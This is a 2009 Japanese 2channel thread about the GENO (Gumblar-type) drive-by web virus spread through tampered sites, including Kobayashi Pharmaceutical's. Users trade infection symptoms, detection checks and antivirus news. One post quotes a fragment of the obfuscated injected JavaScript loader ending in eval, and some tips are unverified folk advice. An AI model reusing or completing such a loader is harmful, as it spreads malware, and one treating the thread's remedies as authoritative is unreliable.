名無しさん@九周年:2009/05/19(火) 10:44:00 ID:kq0G1PYC0
スレタイがよろしくないのかねぇ
753 :
名無しさん@九周年:2009/05/19(火) 11:06:17 ID:0mo4AWTP0
こわいなあ
754 :
名無しさん@九周年:2009/05/19(火) 11:33:21 ID:qCwb2X+M0
>>751 企業側からすれば感染して攻撃側になった事実を認めると
イメージダウンどころか訴訟になりかねんからな
テレビのほうにも圧力かけてるんだろう
>>55 これすごいな
ターミネーターでスカイネットが戦争始めたときみたいだ
756 :
名無しさん@九周年:2009/05/19(火) 11:49:13 ID:PXMvSSdg0
大変なニュースなのに、テレビ、新聞大手メディアは完全スルーだな。
プリウス新発売のニュースなぞほっとけ
757 :
名無しさん@九周年:2009/05/19(火) 11:50:28 ID:b0yOteyX0
>>755 感染したボットネットがいまどのくらいの数いるんだろう.
それらにどんな指示を出すんだろう.
パソコン通信黎明期から見てきた.
軍事ネットが学術ネットになり,商用可されてインターネットになるのも見てきた.
色んな混沌闇をみてきた.
次はネットそのものが闇に?
>>757 数百万とも数千万とも。で、それを闇売買しているそうだよ。
759 :
名無しさん@九周年:2009/05/19(火) 12:15:36 ID:bXb8ZMQfO
バスター仕事しろ
760 :
名無しさん@九周年:2009/05/19(火) 12:20:04 ID:oiH+1hJ3O
ようやく関連スレっぽいの建ったなage
761 :
名無しさん@九周年:2009/05/19(火) 12:25:01 ID:Kxxonpve0
わたし昨日小林製薬のサイト見たけど
昨日は大丈夫だよね
>>751 同人スレでは盛り上がりのピーク越えたかな?w
まぁあそこは内容ループ地獄だがwww
>>762 同人板の奴らは人間としてダメなのばかりだからな。
被害妄想爆発させてるだけで、感染拡大防止なんて全く頭にないみたい。
765 名前:192.168.0.774[sage] 投稿日:2009/05/19(火) 12:23:36 ID:kGobtrBpP
ちょい報告、ガイシュツだったらすまん。
全ての対策をおこなったPCでGENO感染したサイトを訪問
↓
avast!が遮断
↓
念のためavast!およびカスペ・バスターのオンラインでフルスキャン
↓
C:\WINDOWS\system32内に「system32.exe」が作成されているのを発見
↓
「system32.exe」の更新日時は2005年だが、作成日時はGENO感染サイト訪問時
↓
ヒューリスティック予測で「system32.exe」の疑わしい挙動を検出
とりあえず「system32.exe」は除去したが、まだ何かが潜んでいそうだ。
おまえらもC:\WINDOWS\system32を調べてみれ
ちなみに既知の「system32.exe」を作るワームとは別物。
766 名前:192.168.0.774[sage] 投稿日:2009/05/19(火) 12:32:23 ID:8FgxAqIl0
未感染PCではSystem32.exeは存在しないな
GENOウィルス流行る
↓
セキュ板住人(兼同人板住人?)が初代スレ立てて広報してくれる
↓
意味が理解できず、板違いと叩く人などが出てくる
↓
理解して不安になった人が、なぜか質問スレではなくセキュリティ板のGENOスレ(分析や議論しているとこ)に押しかけて質問攻めする
↓
セキュリティ板のGENOスレでは同人板へ帰るよう誘導(その代わり同人板へ出張して質問に答える)
↓
同人板住人、なぜか質問に答える人を叩きだす(最初は自分も質問してたくせに...)
↓
同人板のスレからは今北さんを追い出し、他板に押し付けようとする人が演説を始める
↓
「質問禁止にしよう、質問は他板へ誘導してやれ!」と極めて自分勝手な理屈を述べだす
↓
「ハザードマップ作成や検体確保のために感染URLを公表して欲しい」との要請に対し、「凸が怖い」と保身を優先して拒否
↓
他板、同人板住人のあまりに自己中心的なDQN行為に驚愕する
↓
自己中を批判する人、腐女子嫌いで便乗叩きする者などが押し寄せる
↓
なぜか全てをセキュリティ板の仕業と勘違いした同人板住人が逆恨みでセキュリティ板を荒らす
↓
状況をみて面白がった厨房たちが、同人板・セキュリティ板ともに便乗荒らしをはじめる
↓
セキュリティ板は同情され、同人板は嘲笑と侮蔑の的となる
↓
VIPを中心に、801同人サイトを版権者へ通報&凸晒し祭りの準備が始まる ←New!
>>741 俺98se
レジストリエディタなど両方とも立ち上がったし、一応大丈夫だとは思うが…
収集するまで専ブラで2ch見るだけになりそう
>>741,766
9x系はsystem32ディレクトリじゃなく、systemディレクトリを調べる
こうして見るとロクなスレ無いなあ
systemディレクトリも問題なしでした
>>741 98はcommandでコマンドプロント起動できるけどMeはそうじゃないのかな?
>>769 Meでも、commandで立ち上がるよ。
ちなみに、アドビ フラッシュとか、バージョン8までしか対応してなかったと思うんだけど。
俺、バージョン9入れたら、Firefox起動時に「カーネル32が〜」と出て、8に戻したよん。
771 :
名無しさん@九周年:2009/05/19(火) 17:05:19 ID:N/YuI7TU0
>>757 今はひたすらボットを増やしているだけのように見えるな。
ボットネットの親玉が、何を狙ってるのか気になる。。
772 :
名無しさん@九周年:2009/05/19(火) 17:20:29 ID:lZkzGH5IO
どうバカホイホイw
773 :
名無しさん@九周年:2009/05/19(火) 17:27:10 ID:hUxviRUW0
>>773 糸ようじスレと聞いて
・・・なんてふざけてる場合じゃないんだが、
どうバカは反応せざるを得ない。
774 :
名無しさん@九周年:2009/05/19(火) 19:10:08 ID:/tQbN+gE0
>>764 system32.exeが作成されるってのはマジ?
775 :
名無しさん@九周年:2009/05/19(火) 19:19:50 ID:VaoxPDGZP
776 :
名無しさん@九周年:2009/05/19(火) 19:24:06 ID:Wp6rxrIC0
system32.exeがsystem32フォルダ以外にも作られた報告が出てるな。
あと検索してもファイルは出てこないが、プロセスではsystem32.exeがしっかり活動しているという。
system32.exeを展開した本体は別の場所に潜伏してるだろうし・・・
GENOウィルスの作者は何重にも手の込んだことをしてるので、かなりやっかいだ。
777 :
名無しさん@九周年:2009/05/19(火) 19:25:36 ID:bidX9zrU0
>>765 あ〜・・・、だから板全体が荒れてたんだ・・・
779 :
名無しさん@九周年:2009/05/19(火) 19:33:05 ID:rPxdORxR0
まだ終わってないんだよなぁ
怖すぎだろ
>>778 LAN切断するとシステムをクラッシュするという、怨念たっぷりの努力だもんなあ・・・
781 :
名無しさん@九周年:2009/05/19(火) 19:37:57 ID:ThyeGDmN0
終わりはないさ
セキュリティに穴がある限り盗み出す情報がカネになる限り無くなることはない
むしろもっとひどくなるだろうな
782 :
名無しさん@九周年:2009/05/19(火) 19:44:21 ID:j6oZPyT40
製薬会社にコンピュータウィルスというギャグ・・・・? と思ってきてみた
もはやギャグにならないレベル。
784 :
名無しさん@九周年:2009/05/19(火) 19:54:10 ID:/tQbN+gE0
>>782 ギャグだと思ったら全然違って
あちこちのサイトが感染してるらしいので対策を講じても
ウイルス対策ソフトが全然対応してないのに愕然としてる。
家族で共用してることもあって一応警戒はしたがありゃだめかもねぇ
なんでトレン○マイクロ使ってるのかわかんね
786 :
名無しさん@九周年:2009/05/19(火) 19:57:05 ID:u51XYROLO
あげろ、あげるんだ、ジョー
787 :
名無しさん@九周年:2009/05/19(火) 19:57:18 ID:LQTKKltXO
788 :
名無しさん@九周年:2009/05/19(火) 20:00:23 ID:rNhSj7E40
GENOっすか
すごい勢いで広まってるね
>>776 そもそも正規windowsにsystem32.exeなんてあるの?
790 :
岸和田市民 ◆HOXERHLOXY :2009/05/19(火) 20:00:56 ID:sEMKX/Io0 BE:992023799-2BP(2251)
FTPクライアント搭載なのが斬新だな。
パスワード平文だし。(SFTPは知らんが)
そのうちメール自動ハックとか出るんだろうなぁ。
791 :
名無しさん@九周年:2009/05/19(火) 20:06:18 ID:u51XYROLO
ズブの素人に出来ることは、このスレをあげることくらいっす。
あとは行き着けのスレでの広報。
792 :
名無しさん@九周年:2009/05/19(火) 20:09:51 ID:kq0G1PYC0
ニュースでさっぱり取り上げないのが
逆にこえーな
794 :
名無しさん@九周年:2009/05/19(火) 20:12:14 ID:lmy88rEx0
>>1 ウィルスに犯される製薬会社ってシャレにならねぇなw
795 :
名無しさん@九周年:2009/05/19(火) 20:12:20 ID:j6oZPyT40
>>696 そういうのは多分一時ファイル消したらでてこなくなる。
796 :
名無しさん@九周年:2009/05/19(火) 20:12:33 ID:Y3lorimA0
そろそろカスペルスキーあたりがワクチン作らないかな
一応FlashとReaderは最新だけどなんか怖い
797 :
名無しさん@九周年:2009/05/19(火) 20:16:27 ID:I01eoMXB0
>>794 自然発生の根拠を立証する責任もあるでしょ。
ウイルス発生の原因や元の話が一般には知られてないのがむしろおかしいでしょ。
対処療法してればいいってそんな無責任なことはない。
>>793 一行目に突っ込んでみたがやっぱりないのか
タスクマネージャでもシステムフォルダでも見たこと無いから気になったわ
799 :
名無しさん@九周年:2009/05/19(火) 20:22:10 ID:Uxo144FjO
えーと
今、うちのXP、変な音だして逝っちゃいました
800 :
名無しさん@九周年:2009/05/19(火) 20:24:11 ID:kq0G1PYC0
801 :
名無しさん@九周年:2009/05/19(火) 20:38:55 ID:sHDsLwQJO
(´・ω・`)GENOウイルスに感染したせいで童貞になりました
おのれ憎きGENOウイルスめ!!
感染する前は非童貞だったの?
803 :
名無しさん@九周年:2009/05/19(火) 20:43:47 ID:Uxo144FjO
>>800 だよね?心当たりないもん
YOUTUBEみるくらいしか使ってないもん
804 :
名無しさん@九周年:2009/05/19(火) 20:45:26 ID:kq0G1PYC0
ニコニコの祭り?で、GENOウイルスを誤検出させるウイルスコード(無害)が
そこらじゅうにコピペされまくってる模様
>>798 system32フォルダにsystem32.exeがあっても不自然じゃなくね?
・・・という意図のファイル名だと思う。
現時点ではsystem32.exeが存在した時点でウィルス感染が確定。
本体はたぶん別のところに潜伏してるので削除するだけじゃダメ。
糸ようじ大人気だな
808 :
名無しさん@九周年:2009/05/19(火) 20:55:50 ID:kq0G1PYC0
809 :
名無しさん@九周年:2009/05/19(火) 21:06:46 ID:yqRfJMgkO
>>780 > LAN切断するとシステムをクラッシュする
うわ、まじか。
810 :
名無しさん@九周年:2009/05/19(火) 21:09:52 ID:yqRfJMgkO
>>765 > GENOウィルス流行る
> ↓
> セキュ板住人(兼同人板住人?)が初代スレ立てて広報してくれる
> ↓
> 意味が理解できず、板違いと叩く人などが出てくる
まずこの時点で頭の悪さがパネェなw
812 :
名無しさん@九周年:2009/05/19(火) 21:14:11 ID:zPjV0Lkr0
>>811 ウイルス感染したら被害拡大させないためにもまずネット回線引っこ抜けって言うだろ?
それして再起動したらサヨウナラってことよ
814 :
名無しさん@九周年:2009/05/19(火) 21:25:25 ID:9J71InRF0
GENOウィルス
win Xpの場合
sqlsodbc.chmのバイト数 50727ならokであろうと言われている。
win 2kの場合sqlsodbc.chmは存在しない。
有った場合削除。
又
ファイル名を指定して実行⇒cmd で変なら疑うべき。
815 :
名無しさん@九周年:2009/05/19(火) 21:30:39 ID:byXqn8DP0
>>690 GENOウイルスチェッカー
危険度0%
安全なURLです。踏んでも大丈夫でしょう。
評価ミス報告
戻る
もう大丈夫みたい
816 :
名無しさん@九周年:2009/05/19(火) 21:35:18 ID:1MLUOU/80
817 :
名無しさん@九周年:2009/05/19(火) 21:40:05 ID:lMwI0tMm0
>>816 `2fscr`69pt`3e`22)`3b`7d';var GvYX=unescape(ayY.replace(/`/g,'%'));eval(GvYX)})();
まっくろくろすけっぽいね
>>727 > Web業界の人間は洒落にならんワームだよなあ
> もっと騒ぎになって良いはずなのに、なんでこんな水面下進行なんだろ
Web屋は「カコイイ俺様」が最優先価値だからじゃないか?
感染したらクノーピクスでデータ救出はできるのでしょうか
>>814 それは既に古い。
新しい異種はそれでは判別不可能。
822 :
名無しさん@九周年:2009/05/19(火) 21:44:24 ID:9J71InRF0
ノートン先生が5/18付のウイルス定義で対応したみたいだよ。
825 :
名無しさん@九周年:2009/05/19(火) 21:48:24 ID:Gdj92R8l0
そういやこの前同僚のPCが妙な動きしてたな・・・
フリーズしたので電源切って強制終了>再起動>しばらく操作受け付けず無反応
しばらくすると何事も無かったように動き出した
何か関係あるのだろうか・・・
826 :
名無しさん@九周年:2009/05/19(火) 21:50:32 ID:byXqn8DP0
>>816 GENOウイルスチェッカー
危険度1000%
超絶危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
評価ミス報告
戻る
踏んだだけでPCぶっ壊れるとか半端じゃないな
828 :
名無しさん@九周年:2009/05/19(火) 21:55:23 ID:FdaTL5AxO
現実世界でもインフルで大変なのに電脳世界でもインフル並のモノが来るとはな
829 :
名無しさん@九周年:2009/05/19(火) 21:58:51 ID:yFri5YmSO
もうわけわかんなくて怖いから
ネットは携帯とmeたんだけで繋ぐようにするわ
てかニュ速+はどのウイルススレもスレタイが緊急性を感じないわ
> 1.「同サイト」を管理していた「社内PC」1台にコンピュータウイルスが感染
要するに、コンピュータ知識もなくウェブサイトの取り扱いをやってた
マカーのWeb屋が死亡するってことかwww
ざまあwwww
意味不明
832 :
名無しさん@九周年:2009/05/19(火) 22:01:58 ID:NfRPepc90
なんでマカー
そろそろ世界規模でセキュリティ会社と政府機関で手を組んで対ウイルス連合作らんと
まずいんじゃね?
バスターやノートンとか複数のソフト入れると同士討ちと殺し合いやってOSまで動かない
とかじゃもう論外ぽ
こえ〜。
今更知ったぞこれ。
とりあえず自分のPCとサイトは無事っぽい。
あとは会社のPCか・・・
835 :
名無しさん@九周年:2009/05/19(火) 22:07:21 ID:5B1Iaf6A0
何でこのスレこんな静かなの
836 :
名無しさん@九周年:2009/05/19(火) 22:09:04 ID:LdoZsDTyO
ジェノサイ・
837 :
名無しさん@九周年:2009/05/19(火) 22:12:20 ID:+RmrjiMs0
Javaスクリプトを常に切ってれば、大丈夫?
よくわからないけどadobeをアンインストールすればいいの?
840 :
名無しさん@九周年:2009/05/19(火) 22:16:20 ID:bidX9zrU0
これの恐いところは安全だったサイトが次の日には感染してるかもしれんってとこだな。
842 :
名無しさん@九周年:2009/05/19(火) 22:17:35 ID:kq0G1PYC0
ノートン先生使えねぇ、と切ったばかりなのに
ここにきて本気出すなんて
843 :
名無しさん@九周年:2009/05/19(火) 22:19:30 ID:5B1Iaf6A0
>>840 だよねー・・・スレタイに「GENO」でも入れてくれてたら違ったかもしれん
そりゃ先生は金とってんだかから、Avastに遅れとったままとか許されないだろ
845 :
名無しさん@九周年:2009/05/19(火) 22:22:35 ID:mjb5HQkD0
新型インフルエンザの事とやと思うやろ パソコンからもかかると思たやんけ
>>39 表示されない&java有効を求めてくるサイトは「あ、そう」てな感じで閉じちまう。
847 :
名無しさん@九周年:2009/05/19(火) 22:26:49 ID:kq0G1PYC0
腐が湧いてこないのはいいんだけどな
848 :
名無しさん@九周年:2009/05/19(火) 22:28:24 ID:UQ6xFuFT0
あれ? 俺この前コマンドプロンプトが立ち上げられなくなって、
2ちゃんもかちゅ〜しゃだとスレを見れなくなって、
Ad-Aware も更新出来なくなったり
他にも不具合でまくりだったんだけど、
これにやられた???
システムの復旧でなおったてるんだが・・
849 :
名無しさん@九周年:2009/05/19(火) 22:33:43 ID:bidX9zrU0
>>848 試しにLAN引っこ抜いて再起動してみればいいんじゃね?
それで無事だったらセーフ
ぶっこわれたら駆除する手間が省けたってことでやはりセーフ
バックアップ完了 まあたいした物は入ってないけど
リカバリディスクどこやったかな…?
カスペルさんが対応してくれる日までリアルでもバーチャルでもウィルスに怯える日々が続きそう
852 :
名無しさん@九周年:2009/05/19(火) 22:49:43 ID:u51XYROLO
大事件あげ。
日経ITProのホムペで
このPCウィルスのニュースを見つけたけど、
5月15日付けのニュースなんだよなぁ…。
4日ルールでスレ立たんよ。。orz
853 :
名無しさん@九周年:2009/05/19(火) 22:52:43 ID:UQ6xFuFT0
>>850 駄目だ。やられてたっぽい。
sqlsodbc.chmのファイルサイズも4,096 バイトとか変らしい?し、
adawareもファイル更新できない。
初めてウイルスにやられた。。
アクロバットがいかれてるなぁ、って思ってたんだよな。。
クリーンインストールって、データ全部飛ばしてインストールするしかないのかな・・?
854 :
名無しさん@九周年:2009/05/19(火) 22:54:47 ID:Y3lorimA0
クリーンインストールってのは「PCを買ったときの状態に戻す」ってやつだしね…
バックアップとってる?取ってなかったら諦めるしかないかも
しかしなんで好き好んでウィルスなんか作るんだろうな
855 :
名無しさん@九周年:2009/05/19(火) 22:55:28 ID:/tQbN+gE0
本日、小林製薬のHPに対するマスメディアの警告記事を
見なかったんですが、これは小林製薬からの圧力なんでしょうか?
もし相ならマスメディアの存在意義っていったい・・・・・
857 :
名無しさん@九周年:2009/05/19(火) 22:59:05 ID:bidX9zrU0
>>856 GENOってネーミングがヤバくて放送できないのかもw
858 :
名無しさん@九周年:2009/05/19(火) 23:01:43 ID:klBEWhhi0
これ、あんまり話題になってないね。
インフルエンザより気になるよ。
859 :
名無しさん@九周年:2009/05/19(火) 23:02:39 ID:bidX9zrU0
>>856 ある程度の規模の企業なら、サイト管理にはだいたい広告代理店が噛んでる
マスコミは広告がないと食っていけない
あとはだいたいわかるよな?
861 :
名無しさん@九周年:2009/05/19(火) 23:10:02 ID:6HSf5sD80
>>860 マスコミの存在価値がないことは、分かりましたw
862 :
岸和田市民 ◆HOXERHLOXY :2009/05/19(火) 23:10:53 ID:sEMKX/Io0 BE:171460872-2BP(2251)
なんて発音するのだろう。
863 :
名無しさん@九周年:2009/05/19(火) 23:12:56 ID:/9Goxa180
864 :
現役の人:2009/05/19(火) 23:13:46 ID:+nVqVyAG0
この問題、本当にかなりヤバイのにあまり取り上げられないな。
ウィルス本体はかなりの早さでアップデートされてるから、ウィルス挙動によっては
いつぞやの韓国みたいにインターネットが止まるような事態にすら発展しかねないのだが・・
865 :
仮面の奇行士 ◆Balrog/4lY :2009/05/19(火) 23:17:39 ID:kaXH8UCjO
>>853 大変ですな。
そういう専門的なことは板を変えて質問した方が絶対いいぞ。適切な板を探してみなされ。
AntiVirは偉大だわ。まじ惚れた。
867 :
名無しさん@九周年:2009/05/19(火) 23:50:15 ID:3m8KwCe80
>>864 TVのニュースで取り上げたら、新型インフルの話とごっちゃになって
視聴者が混乱するから控えておこうとかなんとか考えてるような気がしないか?
868 :
名無しさん@九周年:2009/05/19(火) 23:56:05 ID:Gdj92R8l0
それにしてもスレタイに緊迫感が全く無いな
Web見るだけでPCクラッシュとか初耳なんだが良くある事なの?
870 :
名無しさん@九周年:2009/05/20(水) 00:11:39 ID:iGCw3hbD0
>>868 前にも何かあった気がする。
ココまで酷くはなかったかもしれないけど・・・
スレタイが恐怖を煽らないと緊迫感が出ないんではないかい?
【セキュリティ】サイトが改ざん被害、普通に閲覧で史上最悪のコンピューターウィルス感染も
とか?
872 :
名無しさん@九周年:2009/05/20(水) 00:27:25 ID:H78oABP+0
確かにスレタイが駄目すぎるよな。人目を引かん。
と言う訳でageるぜよ
873 :
名無しさん@九周年:2009/05/20(水) 00:30:50 ID:7fzjivAZ0
うちのカスペルさんはブロックしてくれるのか?
どっちに比重を置くかだが
俺は賢い人のアドバイスに従い
さっさと制限ユーザーにした
ウイルス対策ソフトは入れてない
そこは入れておけよwww
876 :
名無しさん@九周年:2009/05/20(水) 00:50:43 ID:UXc3+gy20
【セキュリティ】サイト閲覧だけで感染!凶悪PCウィルス被害…ウィルススキャンも効果なし?
情報を簡単にまとめるとこんな感じのようだが煽りすぎかなw
877 :
現役の人:2009/05/20(水) 00:52:49 ID:vHzbeQMV0
>>876 > 【セキュリティ】サイト閲覧だけで感染!凶悪PCウィルス被害…ウィルススキャンも効果なし?
>
> 情報を簡単にまとめるとこんな感じのようだが煽りすぎかなw
【セキュリティ】サイト閲覧だけで感染!凶悪PCウィルス猛威…ウィルススキャンも未だ未対応
こんな感じじゃね
878 :
名無しさん@九周年:2009/05/20(水) 01:02:09 ID:asdPto8m0
立ち上がり時
biosとosの間はロックできる。
問題は これなんだがね。
>>765 >VIPを中心に、801同人サイトを版権者へ通報&凸晒し祭りの準備が始まる
で、また意味のわからん当て字と身内用語だらけになるのか。
あの妙な身内意識のキモさは、鬼女板の比じゃねぇぜ。
もっと恐ろしいものの片鱗を味わうんだぜ・・・
やっぱし、ダム板が一番常識的でイケメンエリート揃いでいいよな。
880 :
岸和田市民 ◆HOXERHLOXY :2009/05/20(水) 01:46:32 ID:m7+2mxQw0 BE:306180555-2BP(2251)
どこだってそうだろ。
ほんとコテは糞レスしかしないな
とりあえず、今のとこ感染が疑われる問題は何もないな。しかし、電脳も現実もウイルスにしてやられてるのう。
883 :
名無しさん@九周年:2009/05/20(水) 02:26:31 ID:Y8f2KfgB0
こんな悪質なウイルスってもうテロレベルだろ
こういうのって犯人を特定して捕まえるのって難しいの?
ひんと:中国様
886 :
( ´`ω´)φ ★:2009/05/20(水) 05:40:54 ID:???0
ヒューリスティックでも捕まえられなかったの?
Vistaでは今のとこ感染しないの?
889 :
名無しさん@九周年:2009/05/20(水) 07:45:24 ID:DgG5lyCT0
亜種が出てきてるからなんとも言えない状況
だった気がする
890 :
名無しさん@九周年:2009/05/20(水) 08:01:21 ID:1tIctchoO
糸ようじで駆除でしょ
891 :
名無しさん@九周年:2009/05/20(水) 08:14:55 ID:8i9VsO/m0
>>39 そういうの使わないとサイト作ってる会社が金取る口実にならないからだろ。
画像とテキストだけならビルダー使って自分でやろっかて話になる。
数日前に親用のPC教室のサイト調べてて、あるサイトに飛んだら
Avast!がこのウィルスに反応して隔離してくれた。
たまたまVistaマシンで回ってたし、問題は無かった。
AdobeのReaderとFlash Playerを最新版にして、
JAVAスクリプト切ってFirefoxにNoScript入れれ。
Avast!では「トロイの木馬」型として検出されたよ。
しかしPC教室のサイトまで感染してたなんて。
【レス抽出】
対象スレ:【セキュリティ】サイトが改ざん被害、閲覧でウイルス感染の可能性(小林製薬)[09/05/14]
キーワード:糸ようじ
抽出レス数:20
www
>>888 UACを切ってなければ今のところ大丈夫なはず。
896 :
名無しさん@九周年:2009/05/20(水) 08:49:42 ID:W9Zu6Ptr0
小林製薬のメールマガジンから、お風呂の裏技みたいなページを読んだ
次にPCを開いた時、エクスプローラーが起動しなかった(画面に何も表示されず)
ので、タスクマネージャから自力で起動、スタートアップ項目も思いつくやつは自力で起動
この時点では、たんにPCの不調という認識だった
翌日、小林製薬からお詫びのメール、タイミング的に感染した可能性が高い
コマンドプロンプト起動不可、レジストリエディタ起動不可
sqlsodbc.chmファイルのサイズは1.29KB(1323バイト)
紹介されていたサイトのオンラインスキャンを実施
見つかったのはTrackingCookie数個だけ、すべて除去
現時点では、まだ不具合は解消せず、泣きそう
感染済みの場合は
ノートンしか反応しない
ノートンあったら大至急入れろ
898 :
名無しさん@九周年:2009/05/20(水) 09:38:43 ID:1YX8WHLb0
ActivX切っておけば大丈夫じゃないのか
900 :
名無しさん@九周年:2009/05/20(水) 10:06:54 ID:StpDxivx0
901 :
名無しさん@九周年:2009/05/20(水) 10:33:16 ID:sTV4aR6J0
>>896 ご愁傷様ですとしか言いようが…
現時点では本当に可哀想だが対処法は
>>899しかない。
FTPは使ってないよな?絶対使うなよ!
902 :
名無しさん@九周年:2009/05/20(水) 10:39:36 ID:uZezsiqs0
安置ウイルスソフトとかSpybot入れてれば二段階で防止できたのに、
御愁傷様、
903 :
名無しさん@九周年:2009/05/20(水) 10:46:24 ID:SOElXb570
トロイの木馬から新型インフルエンザまで効く
小林製薬の抗ウイルス剤ソフトの宣伝じゃないの?
小林製薬「閲覧 その前に」
906 :
名無しさん@九周年:2009/05/20(水) 11:31:33 ID:UY0tIqpf0
感染の有無をチェックする簡易検査法
スタート→ファイル名を指定して実行→regedit.exe
「レジストリ・エディタ」が起動すればシロ。
ちなみに「レジストリ・エディタ」はいじらずに閉じましょう。
下手にいじると危ないです。
このまえウイルスバスターをコンビニ支払いで更新したばっかなんだけど
PCを再インストールしてウイルスバスターを入れなおした場合どうなる?
908 :
名無しさん@九周年:2009/05/20(水) 11:38:01 ID:Cg7AOtEW0
見逃すとか目立たないとか言うけど
2chの一板が全てじゃないでしょう
>>907 最インスコ前にシリアルナンバーメモっとけばおk
>>907 インストール用のアカウントとかあるなら再インストールできるんじゃないか?
911 :
名無しさん@九周年:2009/05/20(水) 11:40:26 ID:UY0tIqpf0
糸ようじ
エッチデーデー
>>909 ありがと
ウイルスバスターはいつごろGENOを感知駆除できるようになるかな
早くして欲しい
>>910 ありがと
はがきみたいなのにシリアル番号あったわ
914 :
名無しさん@九周年:2009/05/20(水) 12:19:51 ID:0WseOlzQO
プニルからFFに乗り換える
良い機会になったw
便利すぎ泣いたw
915 :
名無しさん@九周年:2009/05/20(水) 13:02:49 ID:vGk/IEcD0
_____________
/|:: ┌──────┐ ::|
/. |:: | AVAST! | ::| / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|.... |:: |GENOウイルス| ::| | よっしゃ。安心して開けてられるな。
|.... |:: | 感染を防止 | ::| \_ ___________
|.... |:: └──────┘ ::| ∨
\_| ┌────┐ .| ∧∧
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ .∬ ( _)
/ ̄ ̄ ̄ ̄ ̄旦 ̄(_, )
/ \ `
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄_|、_)
 ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄|
 ̄  ̄
_____________
/|:: ┌──────┐ ::|
/. |:: |全撃墜ソフト | ::|
|.... |:: |AhnLab-V3 | ::|
|.... |:: |AntiVir AVG | ::| / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|.... |:: | Kaspersky | ::| | いやー遊んだ遊んだ…。 アレ?
|.... |:: |McAfee Micro| ::| \_ ________
|.... |:: └──────┘ ::| ∨
\_| ┌────┐ .| ∧∧
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ . ( _)
/ ̄ ̄ ̄ ̄ ̄旦 ̄(_, )
/ \ `
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|、_)
 ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄| ̄
はじめて糞VISTAが役に立ったw
917 :
名無しさん@九周年:2009/05/20(水) 13:04:45 ID:sTV4aR6J0
>>906 もうその情報は古いがな。
レジストリエディタ立ち上がっても感染してる場合もあるがな。
今のところはXPならsqlsodbc.chmのサイズと更新日で判断するって事になってる。
でもウイルスが更に進化してて、これも偽装するようになってたら・・・
918 :
名無しさん@九周年:2009/05/20(水) 13:14:53 ID:1YX8WHLb0
これ、ヴィスタは感染しないのか?
はは〜。するってえと、XPを市場から消して、時期ウィンドウズの販売を促進させようとする
マイクロソフト社の陰謀だな。
奴らならやりかねない。
アメブロ狙ってスイーツ(笑)一掃すればいいのに
警鐘age
921 :
名無しさん@九周年:2009/05/20(水) 13:25:54 ID:ZnTNUBQi0
「小林製薬のいとようじ!」 by 大泉洋
922 :
名無しさん@九周年:2009/05/20(水) 13:36:32 ID:sTV4aR6J0
>>921 このウイルスに感染するとエッチデーデーが大変なことになると言うのにお前と来たら
923 :
名無しさん@九周年:2009/05/20(水) 13:37:34 ID:3eaEr47f0
このウイルスに感染するとエッチデーが大変なことになると言うのにお前と来たら
925 :
名無しさん@九周年:2009/05/20(水) 13:38:50 ID:UY0tIqpf0
926 :
名無しさん@九周年:2009/05/20(水) 13:43:50 ID:ZnTNUBQi0
エッチデーデーで何の違和感も無いが、一般人はエイチディーディーなんだろうなあ。電話でフォネティックとか
使ったこと無いんだろうなあ。
928 :
923:2009/05/20(水) 13:57:28 ID:3eaEr47f0
>>925 >>927 スマソ 俺の記憶違いだったみたいだ。
にしても水どうファンは良い人が多いな。
929 :
名無しさん@九周年:2009/05/20(水) 14:17:10 ID:DgG5lyCT0
なんで水どうスレになってんだよwwon
930 :
名無しさん@九周年:2009/05/20(水) 14:29:44 ID:ZnTNUBQi0
糸ようじあげ
931 :
名無しさん@九周年:2009/05/20(水) 14:49:41 ID:T7MhpMUG0
このウィルス用のマスク早く作ってくれ
マジ怖い
932 :
名無しさん@九周年:2009/05/20(水) 15:19:55 ID:5ksPdOhF0
エッチデーデーだから大丈夫だろ
>>926 ヘンリー・デルタ・デルタ?
ふなむし〜
これって、感染状態でLAN切って立ち上げると、BSODなんだよな?
姉貴のパソがそれっぽい症状なんだが・・・。
935 :
名無しさん@九周年:2009/05/20(水) 15:54:21 ID:i//qPt5q0
>>906 やってみたら起動したからセーフ…なのかな
936 :
名無しさん@九周年:2009/05/20(水) 17:07:16 ID:PssZjKEc0
欠陥商品しか売らないマイクロソフト史上、紛う方なき真性の欠陥商品だの
ME以上の糞OSだの、
「VISTA使ってんの?Mなの?バカなの?朝鮮人なの?プププププププ〜」ってさんざんバカにされてきたけど、
使っていればいいこともあるんだな…
937 :
名無しさん@九周年:2009/05/20(水) 17:10:30 ID:oQT2Hvwi0
POWRE USER使えば良いだけじゃん
別にVISTAじゃなくても良いと思うんだが
ここの連中は管理者でログインしっぱなしなのか?
そっちの方が問題だと思うが。。、
938 :
名無しさん@九周年:2009/05/20(水) 17:18:42 ID:JG6iFC2e0
ねえねえ 感染サイトにアクセスして 感染を検知する ソフトはマダでないの?
939 :
名無しさん@九周年:2009/05/20(水) 17:21:18 ID:XDtq6e9j0
AVASTちゃん
>>939 マジ?ノートンとかバスターとかの大手のやつ対応してないの??
そんなにむつかしいことなんだろうか
941 :
名無しさん@九周年:2009/05/20(水) 17:33:02 ID:XDtq6e9j0
あ 誤解しないで
バスターもノートンも対応したみたいだから
ただAVASTは無料なのに一番始めに検知していたエロいやつだったんで
やっとウィルスバスター来たのか
長かったな〜もう今週は無理かと思ってた
943 :
名無しさん@九周年:2009/05/20(水) 18:00:28 ID:sTV4aR6J0
早く次スレになれage
944 :
名無しさん@九周年:2009/05/20(水) 18:00:32 ID:5ksPdOhF0
2年ぶりにノートン先生更新するか?
945 :
名無しさん@九周年:2009/05/20(水) 18:09:22 ID:QxMnDh0f0
なんか「さっさとvista以降に買い換えろよプププ」と言われてるような気がしてならない。
これからは新しいOSがでるたびにウィルスが猛威を奮うんじゃなかろうな。
946 :
名無しさん@九周年:2009/05/20(水) 18:09:30 ID:QEozjhu30
なんか亜種が多いっていう書き込みをよく見るんだが
そういうのにも対応してるのかね
947 :
